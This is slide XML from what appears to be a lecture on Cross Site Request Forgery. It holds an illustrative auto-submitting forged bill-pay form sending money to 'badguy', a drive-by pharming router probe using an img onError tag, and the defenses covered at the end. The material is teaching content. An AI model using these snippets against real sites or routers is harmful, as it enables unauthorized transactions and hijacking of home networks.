          <a:xfrm rot="10800000">
            <a:off x="1828800" y="4572000"/>
            <a:ext cx="2906713" cy="1066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0125" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2655888" y="2786063"/>
            <a:ext cx="2449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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79886" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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0127" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3011488" y="4298950"/>
            <a:ext cx="3076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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90128" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2197100" y="4702175"/>
            <a:ext cx="2932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rgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90129" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2378075" y="230187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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90130" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2759075" y="373380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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90131" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="1952625" y="415925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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79892" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="2963863"/>
            <a:ext cx="2830513" cy="6175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0133" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="312420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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90134" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6248400"/>
            <a:ext cx="5310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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Q: how long do you stay logged on to Gmail?</a:t>
            </a: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 rot="-743562">
            <a:off x="4022725" y="3097213"/>
            <a:ext cx="12128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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(w/ cookie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412116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1143000" y="3200400"/>
            <a:ext cx="6705600" cy="1066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algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg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40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="2438400" cy="4572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 type="none" w="lg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40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80900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Cross Site Request Forgery  (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96262" name="Rectangle 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76962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smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User logs in to  bank.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Session cookie remains in browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits another site containing:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0099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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form  name=F  action=http://bank.com/BillPay.php&gt;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5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;input  name=recipient   value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; …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5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.F.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(); &lt;/script&gt; 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Browser sends user auth cookie with request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Transaction will be fulfilled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u="sng" dirty="0" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie auth is insufficient when side effects occur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196298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Form post with cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="Picture 12" descr="basic-csrf-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0" y="1462088"/>
            <a:ext cx="8350250" cy="539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191000" y="4267200"/>
            <a:ext cx="2590800" cy="2365375"/>
            <a:chOff x="4191000" y="4267200"/>
            <a:chExt cx="2590800" cy="2365375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191000" y="6232525"/>
              <a:ext cx="199231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9" tIns="45719" rIns="91439" bIns="45719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40458C">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>User credentials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479925" y="4267200"/>
              <a:ext cx="2301875" cy="479425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9" tIns="45719" rIns="91439" bIns="45719" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4618038" y="5218112"/>
              <a:ext cx="1485900" cy="54292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675188" y="4403725"/>
            <a:ext cx="2122487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296" tIns="41148" rIns="82296" bIns="41148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rgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr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</a:rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr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</a:rPr>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr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</a:rPr>
              <a:t>=523FA4cd2E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35551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err="1" smtClean="0"/>
              <a:t>Cookieless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Example:  Home Router</a:t>
            </a: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837513D6-D2EB-42E0-BD8E-887A70F18540}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82948" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapt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352800"/>
            <a:ext cx="1436688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4" descr="DS15server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5181600"/>
            <a:ext cx="2436813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094413" y="4800600"/>
            <a:ext cx="1652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660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Bad web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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4176713" y="1981200"/>
            <a:ext cx="1608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660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Home router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82952" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1738313" y="2927350"/>
            <a:ext cx="2057400" cy="43656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23561" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="4781550"/>
            <a:ext cx="727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660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23562" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2108200" y="2470150"/>
            <a:ext cx="1978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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>configure router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82955" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1828800" y="4953000"/>
            <a:ext cx="3733800" cy="9144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564" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="1949450" y="3186113"/>
            <a:ext cx="2462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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82957" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1893888" y="4343400"/>
            <a:ext cx="3668712" cy="8572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566" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="781820">
            <a:off x="3046413" y="4371975"/>
            <a:ext cx="1654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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23567" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="822181">
            <a:off x="2216150" y="4973638"/>
            <a:ext cx="2932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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23568" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1677988" y="270192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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23569" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2606675" y="411480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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23570" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1949450" y="454025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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82963" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1905000" y="3498850"/>
            <a:ext cx="1981200" cy="4064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572" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="352107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40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82965" name="Picture 2" descr="http://www.usc-b2b.com/UNIQUE/images/L2100001.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect l="21349" t="5804" r="17416" b="8801"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4357688" y="2347913"/>
            <a:ext cx="10382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442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Attack on Home Router</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839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610600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50% of home users have broadband router with a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>default or no password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>Drive-by Pharming attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:    User visits malicious site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>JavaScript at site scans home network looking for broadband router:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>SOP allows “send only” messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Detect success using onerror:     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>		&lt;IMG   SRC=192.168.0.1   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> = do() &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Once found, login to router and change DNS server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="396875" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: “send-only” access sufficient to reprogram router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93189" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6954838" y="1143000"/>
            <a:ext cx="1122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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>[SRJ’07]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176412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CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860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Secret Validation Token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err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Validation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Custom HTTP Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
